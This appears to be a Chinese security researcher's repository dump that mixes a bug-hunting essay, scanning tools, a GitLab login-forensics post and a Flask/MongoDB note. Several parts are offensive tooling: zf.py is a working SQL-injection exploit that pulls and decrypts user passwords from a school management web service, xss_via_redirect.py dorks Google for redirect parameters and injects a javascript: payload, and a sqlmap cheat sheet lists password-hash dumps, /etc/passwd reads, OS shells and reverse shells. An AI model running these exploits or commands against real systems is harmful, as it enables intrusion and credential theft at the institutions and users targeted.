The first question is of course how to find targets. I don't have a good method either; all I can say is keep your eyes open. A while back I bought some clothes and found I had to install an app to collect the delivery, so I did. After picking up the clothes I poked at it casually and found the vendor had an arbitrary password reset; after I reported it on WooYun they even said they'd send me a gift. Another story: at a meetup I met a core white hat, 专业种田, who walked us through using Burp Suite, finding bugs with search engines, and so on. But that isn't the point; the point is that on his way back to Shenzhen he had to go through Guangzhou South railway station, and right there he found 广州高铁站手机充电终端沙盒绕过(可留后门控制手机): a sandbox bypass in the station's phone-charging kiosks that let you backdoor and control the phone. It left me amazed that he hacks wherever he goes.

Found a target but your skills fall short? I think this comes down to fundamentals plus care: the vast majority of vulnerabilities are not as hard as you imagine, at least judging by what I've seen on WooYun. SQL injection: everyone knows the name, everyone can run sqlmap, but do you know how it works inside? Stealing cookies with XSS: you need to understand the front end, right? Uploading a one-line webshell and connecting with 菜刀 to go straight for the heart: you need to know what backend they run, which means knowing JSP/PHP/ASP/Python and the rest. Can't find a hole attacking head-on? You can look at sibling domains and the C-class subnet, and that's impossible without basic DNS and IP addressing knowledge. So without fundamentals, a vulnerability sitting right in front of you is useless.

So I think I need to stay patient, not get carried away, and keep shoring up the basics.

* Read what others have left behind: WooYun's vulnerability write-ups hold many excellent ideas; read widely and broaden your horizons. (At the moment I only read the WooYun zone discussions, the WooYun Wiki and WooYun's disclosed bugs.)
* Where you can reproduce the environment, test it yourself; hands-on is more fun! For instance the recently disclosed 【乌云峰会】网易闪电邮远程命令执行附思路分析: you could grab an old version of the software and play with it. You'll remember it far better than you would from just reading.
* Try to share. I'm not doing enough of this yet; I hope I can settle down and write more.

That's my experience and a bit of reflection from recent months, posted for reference only. On finding someone to take you under their wing: I think you can learn plenty without one; where IQ falls short, make it up with diligence! Learn to search! And no, this post isn't an advertisement for WooYun; I just use grinding rank on WooYun as a goal to motivate myself.


Zhihu link: http://www.zhihu.com/question/37062603/answer/71139922
--------------------------------------------------------------------------------
/tools/generate_csrf_form.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Turn the POST requests in a Burp Suite history export (Proxy > HTTP history >
# "Save items", XML format) into self-contained HTML forms for CSRF testing.

import sys
import argparse
import base64
from urlparse import parse_qsl
from xml.dom import minidom
from xml.sax.saxutils import escape


def html_attr(value):
    # Values arrive URL-decoded from the request body; escape them so a quote
    # or angle bracket inside a parameter cannot break out of the attribute.
    return escape(value, {'"': '&quot;'})


def decode_form_urlencoded_values(request_body, encoding='utf-8'):
    for pair in parse_qsl(request_body, keep_blank_values=True):
        yield tuple(i.decode(encoding) for i in pair)


def format_input(name, value):
    return '<input type="hidden" name="%s" value="%s" />' % (html_attr(name), html_attr(value))


def generate(index, item):
    url = item.getElementsByTagName('url')[0].firstChild.wholeText
    method = item.getElementsByTagName('method')[0].firstChild.wholeText
    if method.lower() != 'post':
        print("Only POST requests are supported; skipping item %d (%s %s)" % (index, method, url))
        return

    request = item.getElementsByTagName('request')[0]
    content = request.firstChild.wholeText
    # Burp marks binary-safe bodies with base64="true". getAttribute() returns
    # '' when the attribute is absent, where attributes['base64'] raised KeyError.
    if request.getAttribute('base64') == 'true':
        content = base64.b64decode(content)
    # Body follows the first blank line; partition() tolerates a missing body.
    body = content.partition("\r\n\r\n")[2]

    # Minimal template (the original's markup was not preserved): a plain form
    # with a submit button, so the tester can see and trigger the request.
    form = '''<html>
<body>
<form action="%s" method="POST">
%s
<input type="submit" value="Submit request" />
</form>
</body>
</html>'''

    inputs = '\n'.join([format_input(name, value) for name, value in
                        decode_form_urlencoded_values(body)])
    html = form % (html_attr(url), inputs)
    output_file = 'csrf_' + str(index) + '.html'
    with open(output_file, 'wb') as f:
        f.write(html.encode('utf-8'))
    print("Wrote %s for %s" % (output_file, url))


def main(argv):
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--input', type=str, required=True,
                        help='The burp history xml file.')
    args = vars(parser.parse_args(argv))
    input_file = args['input']
    xml_doc = minidom.parse(input_file)
    item_list = xml_doc.getElementsByTagName('item')
    for index, item in enumerate(item_list):
        generate(index, item)


if __name__ == '__main__':
    main(sys.argv[1:])
--------------------------------------------------------------------------------
/tools/hunt.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# For each domain in the input file, fetch /crossdomain.xml (flagging the
# wide-open <allow-access-from domain="*"/> policy) and probe for an exposed
# /.git/config, which usually means the whole repository can be pulled down.

import argparse
import json
import requests
import sys

from multicpu import multi_cpu

HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36', # nopep8
}
TIMEOUT = 10  # seconds; without it a single unresponsive host stalls a worker forever


def read_file(input_file):
    with open(input_file) as f:
        domain_list = f.readlines()
    result = []
    for domain in domain_list:
        domain = domain.strip().rstrip('/')
        if not domain:
            continue
        if not domain.startswith(('http://', 'https://')):
            domain = 'http://' + domain
        result.append(domain)
    return result


def fetch(url):
    # Redirects are deliberately not followed: a 302 to a login page or a
    # wildcard vhost would otherwise look like a hit.
    return requests.get(url, headers=HEADERS, allow_redirects=False, timeout=TIMEOUT)


def hunt(domain):
    result = {'domain': domain}
    try:
        res = fetch(domain + '/crossdomain.xml')
        if res.status_code // 100 == 2:
            result['crossdomain'] = res.text
            result['crossdomain_allow_any'] = 'domain="*"' in res.text
    except requests.RequestException as e:
        result['crossdomain_error'] = str(e)

    try:
        res = fetch(domain + '/.git/config')
        # A real git config starts with a [core] section; requiring it avoids
        # counting catch-all 200 pages as a leaked repository.
        result['git_hack'] = (res.status_code // 100 == 2 and '[core]' in res.text)
    except requests.RequestException as e:
        result['git_error'] = str(e)

    return result


def main(argv):
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--input', type=str, required=True,
                        help='The input file consists of domains.')
    parser.add_argument('-c', '--cpu_num', type=int)
    parser.add_argument('-t', '--thread_num', type=int)
    args = vars(parser.parse_args(argv))
    input_file = args['input']
    domain_list = read_file(input_file)
    cpu_num = 2 if args['cpu_num'] is None else args['cpu_num']
    thread_num = 4 if args['thread_num'] is None else args['thread_num']
    # multi_cpu returns the per-domain results collected from the workers
    # (see the multicpu package); emit one JSON object per line for grepping.
    results = multi_cpu(hunt, domain_list, cpu_num, thread_num)
    for r in results:
        print(json.dumps(r))


if __name__ == '__main__':
    main(sys.argv[1:])
--------------------------------------------------------------------------------
/2017-08-27-找出是谁登录了你的Gitlab服务器.md:
--------------------------------------------------------------------------------
## Finding out who logged in to your GitLab server

> Dear user: your server xxx.xxx.xxx.xxx was logged in to from XX city (`14.113.xxx.xxx`). It has very likely been compromised by an attacker. Please go to the Cloud Shield - Server Security (Anqi) console immediately to review and handle it. If you confirm this was your own action, please ignore this message. Click here to view.

#### Log in to the GitLab server and check `/var/log/auth.log`

```bash
$ grep "14.113.xxx.xxx" /var/log/auth.log
Aug 27 21:40:37 gitlab sshd[17276]: Received disconnect from 14.113.xxx.xxx: 11: Closed due to user request. [preauth]
Aug 27 21:40:46 gitlab sshd[17299]: Accepted publickey for git from 14.113.xxx.xxx port 13370 ssh2: RSA a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx
Aug 27 21:41:03 gitlab sshd[17320]: Received disconnect from 14.113.xxx.xxx: 11: Closed due to user request.
Aug 27 21:41:42 gitlab sshd[17435]: Accepted publickey for git from 14.113.xxx.xxx port 14544 ssh2: RSA a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx
Aug 27 21:41:42 gitlab sshd[17462]: Received disconnect from 14.113.xxx.xxx: 11: Closed due to user request.
```

This gives the public-key fingerprint of the suspicious login: a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx. The `Accepted publickey for git` lines mean these were Git-over-SSH operations authenticated with a key registered in GitLab (the `git` user has no shell access), so the key maps to exactly one GitLab account.

#### List all GitLab users

GitLab's API: https://docs.gitlab.com/ce/api/users.html#for-admins

I simply opened `/api/v4/users?per_page=100` in the browser and saved the response as `users.json`. (`per_page` maxes out at 100; on a larger instance page through the results with `page=2`, `page=3`, and so on.)

#### Python script

```python
import base64
import hashlib
import json
import requests


# https://stackoverflow.com/a/6682934
def lineToFingerprint(line):
    key = base64.b64decode(line.strip().split()[1].encode('ascii'))
    fp_plain = hashlib.md5(key).hexdigest()
    return ':'.join(a+b for a,b in zip(fp_plain[::2], fp_plain[1::2]))


with open('users.json') as f:
    for u in json.load(f):
        # GitLab serves every user's public keys, unauthenticated, at /<username>.keys
        r = requests.get('https://YOUR_GITLAB_HOST/' + u['username'] + '.keys', timeout=10)
        for l in r.text.splitlines():
            # only RSA keys are considered, matching the "RSA" in the log line above
            if not l.startswith('ssh-rsa'):
                continue

            fingerprint = lineToFingerprint(l)
            if fingerprint == 'a2:45:b8:33:8c:a9:6d:37:63:b3:06:0e:xx:xx:xx:xx':
                print(u['username'] + ' ' + fingerprint)
```

This computes the fingerprint of every user's `ssh keys` public key; compare them against the one from the log and you have your user.

#### Also useful

```bash
$ ssh-keygen -E md5 -lf ~/.ssh/id_rsa.pub
4096 MD5:81:d8:4d:ea:10:22:ce:d6:d5:5a:6d:4c:c5:21:b8:d5 test@test (RSA)
```
--------------------------------------------------------------------------------
/tools/xss_via_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys
5 | import requests
6 |
7 | from googleapiclient.discovery import build
8 | from urlparse import urlparse, parse_qs
9 | from urllib import urlencode
10 |
11 |
12 | PAGE_SIZE = 10
13 |
14 | # https://console.developers.google.com/apis/api/customsearch/overview
15 | # Create a project and take its API KEY; one KEY allows 100 free searches per day
16 | DEVELOPER_KEY = ''
17 |
18 | # https://cse.google.com/cse/all
19 | # Add a search engine whose scope is the entire web; this is its search engine ID
20 | CUSTOM_SEARCH_ENGINE = ''
21 |
22 | session = requests.Session()
23 | session.trust_env = False
24 |
25 |
26 | def search_links(site, keyword, link_dict):
27 |     service = build("customsearch", "v1", developerKey=DEVELOPER_KEY)
28 |     cse = service.cse()
29 |     query = 'site:%s inurl:%s=http' % (site, keyword)
30 |     start = 1
31 |     for i in range(10):
32 |         res = cse.list(
33 |             q=query,
34 |             start=start,
35 |             num=PAGE_SIZE,
36 |             cx=CUSTOM_SEARCH_ENGINE).execute()
37 |         if 'items' not in res:
38 |             break
39 |
40 |         for item in res['items']:
41 |             link = urlparse(item['link'])
42 |             key = link.netloc + link.path
43 |             if key not in link_dict:
44 |                 link_dict[key] = link
45 |         start += PAGE_SIZE
46 |
47 |
48 | def verify(link, keywords):
49 |     payload = 'java\\u0073cript\\u003a\\u0061lert(1);'
50 |     query = parse_qs(link.query)
51 |     for k in keywords:
52 |         if k not in query:
53 |             continue
54 |         query[k] = payload
55 |         headers = {
56 |             'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'
57 |         }
58 |         # parse_qs yields lists, so doseq=True keeps the other parameters intact
59 |         l = link._replace(query=urlencode(query, doseq=True))
60 |         try:
61 |             res = session.get(l.geturl(), headers=headers)
62 |             if res.status_code / 100 != 2:
63 |                 continue
64 |             if payload in res.text:
65 |                 print "[Potential XSS vulnerability] " + l.geturl()
66 |         except:
67 |             print '[ERROR] requesting: ' + l.geturl()
68 |             continue
69 |
70 |
71 | def main(site):
72 |     print '[INFO] Searching links'
73 |     links = {}
74 |     keywords = ['url', 'target', 'u']
75 |     for k in keywords:
76 |         search_links(site, k, links)
77 |     # print links
78 |
79 |     print '[INFO] Finding XSS ...'
80 |     for k, v in links.items():
81 |         verify(v, keywords)
82 |
83 |
84 | if __name__ == '__main__':
85 |     main(sys.argv[1])
85 |
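The defender's counterpart to the check this scanner performs, as an added example that is not part of the tool: a redirect-target validator an application can apply to the `url`/`target`/`u` style parameters the scanner probes. The scanner's payload works when `\u0073`/`\u003a` escapes survive into a script context, so the validator first resolves JavaScript string escapes the way the browser would, then accepts only a site-relative path or an absolute http(s) URL whose host is on an allowlist. The allowlist hosts are assumed values.

```python
import re
from urllib.parse import urlsplit

# Hosts a redirect may legitimately point at (assumed values for this example).
ALLOWED_HOSTS = {"example.com", "www.example.com"}

_JS_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")
# Characters browsers remove from a URL before parsing it
_STRIPPED = {"\t", "\r", "\n"}


def js_unescape(value):
    """Resolve \\uXXXX and \\xXX sequences the way a JavaScript string literal would,
    so "java\\u0073cript" is seen as "javascript" before the scheme check."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), value)


def is_safe_redirect(value, allowed_hosts=ALLOWED_HOSTS):
    """True only for a site-relative path or an absolute http(s) URL on an allowed host."""
    if not value:
        return False
    candidate = js_unescape(value)
    candidate = "".join(ch for ch in candidate if ch not in _STRIPPED)
    # leading control characters and spaces are ignored by browsers, so ignore them too
    candidate = candidate.lstrip("".join(chr(i) for i in range(0x21)))
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return False
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):
            return False  # javascript:, data:, vbscript: and similar
        if "@" in parts.netloc:
            return False  # "https://trusted@attacker/" style confusion
        return parts.hostname in allowed_hosts
    # No scheme: it must be a plain path, not protocol-relative (//host) or a backslash variant
    if candidate.startswith(("//", "/\\", "\\")):
        return False
    return candidate.startswith("/")


if __name__ == "__main__":
    for sample in ("/account", "https://www.example.com/next",
                   r"java\u0073cript\u003a\u0061lert(1);", "//evil.example/"):
        print(f"{sample!r:45} -> {is_safe_redirect(sample)}")
```

The validator checks the parameter value itself; it does not replace output encoding, because a value written into a `<script>` block still has to be JSON-encoded with `<`, `>` and `&` escaped regardless of where it points.
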
--------------------------------------------------------------------------------
/2016-10-13-Flask-MongoEngine连接问题的思考.md:
--------------------------------------------------------------------------------
1 | ## Flask MongoDB database connections
2 |
3 | When working with MongoDB from Flask, I always felt that I had never written any code to check whether the database connection exists and to reconnect if it does not, yet the production service always kept its connection, so I never looked into it closely.
4 |
5 | Today I tried it out: what happens if the MongoDB service is shut down?
6 |
7 | ```bash
8 | $ sudo lsof -i:27017
9 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
10 | uwsgi 2929 www-data 13u IPv4 19497 0t0 TCP flask-app.dev.env:35686->flask-app.dev.env:27017 (ESTABLISHED)
11 | uwsgi 2938 www-data 6u IPv4 20577 0t0 TCP flask-app.dev.env:35689->flask-app.dev.env:27017 (ESTABLISHED)
12 | uwsgi 2939 www-data 6u IPv4 20419 0t0 TCP flask-app.dev.env:35688->flask-app.dev.env:27017 (ESTABLISHED)
13 | mongod 3328 mongodb 9u IPv4 19377 0t0 TCP flask-app.dev.env:27017 (LISTEN)
14 | mongod 3328 mongodb 12u IPv4 19498 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35686 (ESTABLISHED)
15 | mongod 3328 mongodb 13u IPv4 20420 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35688 (ESTABLISHED)
16 | mongod 3328 mongodb 16u IPv4 20578 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35689 (ESTABLISHED)
17 | ```
18 |
19 | Currently every uwsgi process holds a connection to the MongoDB server. After stopping MongoDB, the sockets went into the `CLOSE_WAIT` state, and the web server started returning 500.
20 |
21 | ```bash
22 | $ sudo service mongodb stop
23 | mongodb stop/waiting
24 | $ sudo lsof -i:27017
25 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
26 | uwsgi 2938 www-data 6u IPv4 20577 0t0 TCP flask-app.dev.env:35689->flask-app.dev.env:27017 (CLOSE_WAIT)
27 | uwsgi 2939 www-data 6u IPv4 20419 0t0 TCP flask-app.dev.env:35688->flask-app.dev.env:27017 (CLOSE_WAIT)
28 | ```
29 |
30 | Restart MongoDB without doing anything else.
31 |
32 | ```bash
33 | $ sudo service mongodb start
34 | mongodb start/running, process 4103
35 | $ sudo lsof -i:27017
36 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
37 | uwsgi 2938 www-data 6u IPv4 20577 0t0 TCP flask-app.dev.env:35689->flask-app.dev.env:27017 (CLOSE_WAIT)
38 | uwsgi 2939 www-data 6u IPv4 20419 0t0 TCP flask-app.dev.env:35688->flask-app.dev.env:27017 (CLOSE_WAIT)
39 | mongod 4103 mongodb 9u IPv4 24443 0t0 TCP flask-app.dev.env:27017 (LISTEN)
40 | ```
41 |
42 | As can be seen, the connections are still not re-established. After sending a few requests to the web service, it slowly recovered.
43 |
44 | ```bash
45 | $ sudo lsof -i:27017
46 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
47 | uwsgi 2929 www-data 13u IPv4 24558 0t0 TCP flask-app.dev.env:35707->flask-app.dev.env:27017 (ESTABLISHED)
48 | uwsgi 2938 www-data 6u IPv4 24745 0t0 TCP flask-app.dev.env:35709->flask-app.dev.env:27017 (ESTABLISHED)
49 | uwsgi 2939 www-data 6u IPv4 24636 0t0 TCP flask-app.dev.env:35708->flask-app.dev.env:27017 (ESTABLISHED)
50 | mongod 4103 mongodb 9u IPv4 24443 0t0 TCP flask-app.dev.env:27017 (LISTEN)
51 | mongod 4103 mongodb 12u IPv4 24559 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35707 (ESTABLISHED)
52 | mongod 4103 mongodb 13u IPv4 24637 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35708 (ESTABLISHED)
53 | mongod 4103 mongodb 16u IPv4 24746 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35709 (ESTABLISHED)
54 | ```
55 |
56 | So the web service can recover. However, in later attempts I found that if requests keep arriving continuously, the connections enter the `CLOSE_WAIT` state and rarely reconnect; HTTP requests return 504 in large numbers and only restarting the uwsgi processes brings things back to normal.
57 |
58 | A related document on connection pooling: http://api.mongodb.com/python/current/faq.html#how-does-connection-pooling-work-in-pymongo
59 |
60 | While trying to fix this I found the following message in the uwsgi log:
61 | ```
62 | /home/vagrant/env/local/lib/python2.7/site-packages/pymongo/topology.py:143: UserWarning: MongoClient opened before fork. Create MongoClient with connect=False, or create client after forking. See PyMongo's documentation for details: http://api.mongodb.org/python/current/faq.html#using-pymongo-with-multiprocessing>
63 | "MongoClient opened before fork. Create MongoClient "
64 | ```
65 |
66 | It turned out that the `MongoClient` was created before uwsgi forked its worker processes; the documentation requires the `connect=False` option in this situation, but Flask-MongoEngine does not handle that setting. https://github.com/MongoEngine/flask-mongoengine/issues/266 That is the trap.
67 |
68 | Another approach: let uwsgi's child processes create the MongoClient instead of forking after the app has been loaded, using the uwsgi option [lazy-apps](http://uwsgi-docs.readthedocs.io/en/latest/Options.html#lazy-apps); this increases the application's startup time.
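
The failure mode above in a form that runs without a database, as an added example that is neither Flask-MongoEngine's nor PyMongo's code: a holder that remembers which process built its client and rebuilds it after `fork()`, so a worker never reuses the socket the parent opened. `FakeClient` stands in for `MongoClient`; with PyMongo the factory would be `lambda: MongoClient(uri, connect=False)` so the parent opens no socket in the first place, and `fork_and_report` is a constructed demonstration of the parent/child difference.

```python
import os


class ForkSafeClient:
    """Hand out one client per process and rebuild it after fork().

    `factory` creates the real client. With PyMongo you would pass
    lambda: MongoClient(uri, connect=False) so that the parent never opens a
    socket that its forked workers would then share; here the factory is
    injected so the example runs without a database.
    """

    def __init__(self, factory):
        self._factory = factory
        self._pid = None
        self._client = None

    def get(self):
        pid = os.getpid()
        if self._client is None or self._pid != pid:
            # First use, or we are a forked child holding the parent's object:
            # build a fresh client owned by this process.
            self._client = self._factory()
            self._pid = pid
        return self._client


class FakeClient:
    """Stand-in for MongoClient that only records which process created it."""

    def __init__(self):
        self.created_in = os.getpid()


def fork_and_report(holder):
    """Use the holder in the parent, fork, use it again in the child.

    Returns (parent_pid, pid that built the parent's client, pid that built
    the child's client) so the post-fork rebuild can be checked.
    """
    parent_client = holder.get()
    read_end, write_end = os.pipe()
    child = os.fork()
    if child == 0:
        # child process: the inherited holder must notice the pid change
        child_client = holder.get()
        os.write(write_end, str(child_client.created_in).encode())
        os._exit(0)
    os.close(write_end)
    reported = os.read(read_end, 64)
    os.close(read_end)
    os.waitpid(child, 0)
    return os.getpid(), parent_client.created_in, int(reported)


if __name__ == "__main__":
    holder = ForkSafeClient(FakeClient)
    parent, built_for_parent, built_for_child = fork_and_report(holder)
    print(f"parent {parent}: client built in {built_for_parent}")
    print(f"child client built in {built_for_child} (a new one, not the parent's)")
```

The `lazy-apps` route described above achieves the same thing at the process-manager level: each worker imports the app, and therefore builds its client, only after it has been forked.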
69 |
--------------------------------------------------------------------------------
/tools/zf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | zf.py
4 | ~~~~~~~~~
5 | POC of http://wooyun.org/bugs/wooyun-2015-0122523
6 |
7 | Author: Chaobin Zhang
8 |
9 | Legal Disclaimer: Usage of this script for attacking targets without prior
10 | mutual consent is illegal. It is the end user's responsibility to obey all
11 | applicable local, state and federal laws. Developers assume no liability
12 | and are not responsible for any misuse or damage caused by this program.
13 | """
14 |
15 | import argparse
16 | import base64
17 | import re
18 | import requests
19 | import sys
20 |
21 | KEYS = ['Encrypt01', 'Acxylf365jw']
22 |
23 |
24 | def decode(value, key):
25 |     length_of_value = len(value)
26 |     if length_of_value % 2 == 0:
27 |         mid = length_of_value / 2
28 |         # Split value in the middle -> reverse -> concatenate
29 |         value = value[:mid][::-1] + value[mid:][::-1]
30 |     k = 0
31 |     result = ''
32 |     for v in value:
33 |         c = ord(v)
34 |         bl_1 = 1 if c ^ ord(key[k]) < 32 else 0
35 |         bl_2 = 1 if c ^ ord(key[k]) > 126 else 0
36 |         bl_3 = (1 if c < 0 else 0) | (bl_1 | bl_2)
37 |         bl_4 = (1 if c > 255 else 0) | bl_3
38 |         if bl_4:
39 |             result += v
40 |         else:
41 |             result += chr(c ^ ord(key[k]))
42 |         k = 0 if k + 1 == len(key) else k + 1
43 |     return result
44 |
45 |
46 | def get_password(target, user):
47 |     data = """
48 |
49 |
50 |
51 | 222222' union select Null,kl,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from yhb where yhm='%s
52 | 2013-2014-1
53 | KKKGZ2312
54 |
55 |
56 | """ % (user)
57 |     headers = {
58 |         'Content-Type': 'text/xml; charset=utf-8',
59 |         'SOAPAction': '\"http://www.zf_webservice.com/GetStuCheckinInfo \"'
60 |     }
61 |     res = requests.post(target + '/service.asmx', headers=headers, data=data)
62 |     password = re.findall('(.+?)',
63 |                           res.text, re.S)
64 |     if len(password) != 1:
65 |         print '[ERROR] Can not retrieve %s\'s password' % (user)
66 |         sys.exit(-1)
67 |     password = password[0]
68 |     print '[-] The encrypted password of %s is: %s' % (user, password)
69 |     MD5_HEAD = '{MD5}'
70 |     if password.startswith(MD5_HEAD):
71 |         print '[-] Password in MD5 form: %s' % (
72 |             base64.b64decode(password[len(MD5_HEAD):]).encode('hex'))
73 |     else:
74 |         yes = raw_input(
75 |             '[*] Do you want to decrypt the password using the default keys? ')
76 |         if yes == 'y' or yes == 'yes':
77 |             for k in KEYS:
78 |                 print '[-] Key ' + k + ': ' + decode(password, k)
79 |
80 |
81 | def main(argv):
82 |     parser = argparse.ArgumentParser()
83 |     parser.add_argument('-t', '--target', type=str,
84 |                         help='The target address you want to test.')
85 |     parser.add_argument('-u', '--user', type=str,
86 |                         help='The user you want to get password from.')
87 |     args = vars(parser.parse_args(argv))
88 |     if args['user'] is None:
89 |         args['user'] = 'jwc01'
90 |     target = args['target']
91 |     if target is None:
92 |         target = raw_input(
93 |             '[*] Please input your target, like "http://xx.edu.cn": ')
94 |     HTTP = 'http://'
95 |     if not target.startswith(HTTP):
96 |         target = HTTP + target
97 |
98 |     get_password(target, args['user'])
99 |
100 |
101 | if __name__ == '__main__':
102 |     main(sys.argv[1:])
103 |
--------------------------------------------------------------------------------
/2015-11-07-SQLMap.md:
--------------------------------------------------------------------------------
1 | The sqlmap tool
2 | ==========
3 |
4 | sqlmap homepage: https://github.com/sqlmapproject/sqlmap
5 |
6 | sqlmap examples (copied from https://github.com/LiveXY/elearning/blob/master/sqlmap%E5%B7%A5%E5%85%B7.md ):
7 |
8 | * Get the current user name
9 |
10 | ```bash
11 | $sqlmap -u "http://url/news?id=1" --current-user
12 | ```
13 |
14 | * Get the current database name
15 |
16 | ```bash
17 | $sqlmap -u "http://www.xxoo.com/news?id=1" --current-db
18 | ```
19 |
20 | * List tables
21 |
22 | ```bash
23 | $sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name"
24 | ```
25 |
26 | * List columns
27 |
28 | ```bash
29 | $sqlmap -u "http://url/news?id=1" --columns -T "tablename" -D "db_name" -v 0
30 | ```
31 |
32 | * Dump the contents of a column
33 |
34 | ```bash
35 | $sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
36 | ```
37 |
38 | * --smart: smart mode; --level: level of tests to perform
39 |
40 | ```bash
41 | $sqlmap -u "http://url/news?id=1" --smart --level 3 --users
42 | ```
43 |
44 | * --dbms: specify the DBMS type
45 |
46 | ```bash
47 | $sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users
48 | ```
49 |
50 | * List database users
51 |
52 | ```bash
53 | $sqlmap -u "http://url/news?id=1" --users
54 | ```
55 |
56 | * List databases
57 |
58 | ```bash
59 | $sqlmap -u "http://url/news?id=1" --dbs
60 | ```
61 |
62 | * Database user password hashes
63 |
64 | ```bash
65 | $sqlmap -u "http://url/news?id=1" --passwords
66 | ```
67 |
68 | * Password hash of a given database user
69 |
70 | ```bash
71 | $sqlmap -u "http://url/news?id=1" --passwords -U root -v 0
72 | ```
73 |
74 | * Dump the given columns, 20 rows
75 |
76 | ```bash
77 | $sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20
78 | ```
79 |
80 | * Dump all tables of all databases
81 |
82 | ```bash
83 | $sqlmap -u "http://url/news?id=1" --dump-all -v 0
84 | ```
85 |
86 | * Check privileges
87 |
88 | ```bash
89 | $sqlmap -u "http://url/news?id=1" --privileges
90 | ```
91 |
92 | * Check the privileges of a given user
93 |
94 | ```bash
95 | $sqlmap -u "http://url/news?id=1" --privileges -U root
96 | ```
97 |
98 | * Is the current user a database administrator
99 |
100 | ```bash
101 | $sqlmap -u "http://url/news?id=1" --is-dba -v 1
102 | ```
103 |
104 | * Enumerate database user roles
105 |
106 | ```bash
107 | $sqlmap -u "http://url/news?id=1" --roles
108 | ```
109 |
110 | * Inject user-defined functions (to obtain system-level access!)
111 |
112 | ```bash
113 | $sqlmap -u "http://url/news?id=1" --udf-inject
114 | ```
115 |
116 | * List all tables of the current database
117 |
118 | ```bash
119 | $sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0
120 | ```
121 |
122 | * UNION query of table records
123 |
124 | ```bash
125 | $sqlmap -u "http://url/news?id=1" --union-cols
126 | ```
127 |
128 | * Cookie injection
129 |
130 | ```bash
131 | $sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE"
132 | ```
133 |
134 | * Get banner information
135 |
136 | ```bash
137 | $sqlmap -u "http://url/news?id=1" -b
138 | ```
139 |
140 | * POST injection
141 |
142 | ```bash
143 | $sqlmap -u "http://url/news?id=1" --data "id=3"
144 | ```
145 |
146 | * Fingerprint the database type
147 |
148 | ```bash
149 | $sqlmap -u "http://url/news?id=1" -v 1 -f
150 | ```
151 |
152 | * Injection through a proxy
153 |
154 | ```bash
155 | $sqlmap -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118"
156 | ```
157 |
158 | * Specify a match string
159 |
160 | ```bash
161 | $sqlmap -u "http://url/news?id=1" --string "STRING_ON_TRUE_PAGE"
162 | ```
163 |
164 | * Run arbitrary SQL statements
165 |
166 | ```bash
167 | $sqlmap -u "http://url/news?id=1" --sql-shell
168 | ```
169 |
170 | * Dump a file
171 |
172 | ```bash
173 | $sqlmap -u "http://url/news?id=1" --file-read /etc/passwd
174 | ```
175 |
176 | * Execute a system command
177 |
178 | ```bash
179 | $sqlmap -u "http://url/news?id=1" --os-cmd=whoami
180 | ```
181 |
182 | * Interactive OS shell
183 |
184 | ```bash
185 | $sqlmap -u "http://url/news?id=1" --os-shell
186 | ```
187 |
188 | * Reverse shell
189 |
190 | ```bash
191 | $sqlmap -u "http://url/news?id=1" --os-pwn
192 | ```
193 |
194 | * Read the Windows registry
195 |
196 | ```bash
197 | $sqlmap -u "http://url/news?id=1" --reg-read
198 | ```
199 |
200 | * Save progress
201 |
202 | ```bash
203 | $sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log"
204 | ```
205 |
206 | * Resume saved progress
207 |
208 | ```bash
209 | $ sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume
210 | ```
211 |
212 | * Find injection points via Google search and dump every column automatically
213 |
214 | ```bash
215 | $sqlmap -g "google语法" --dump-all --batch
216 | ```
217 |
218 | * With a cookie
219 |
220 | ```bash
221 | $sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --passwords
222 | ```
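
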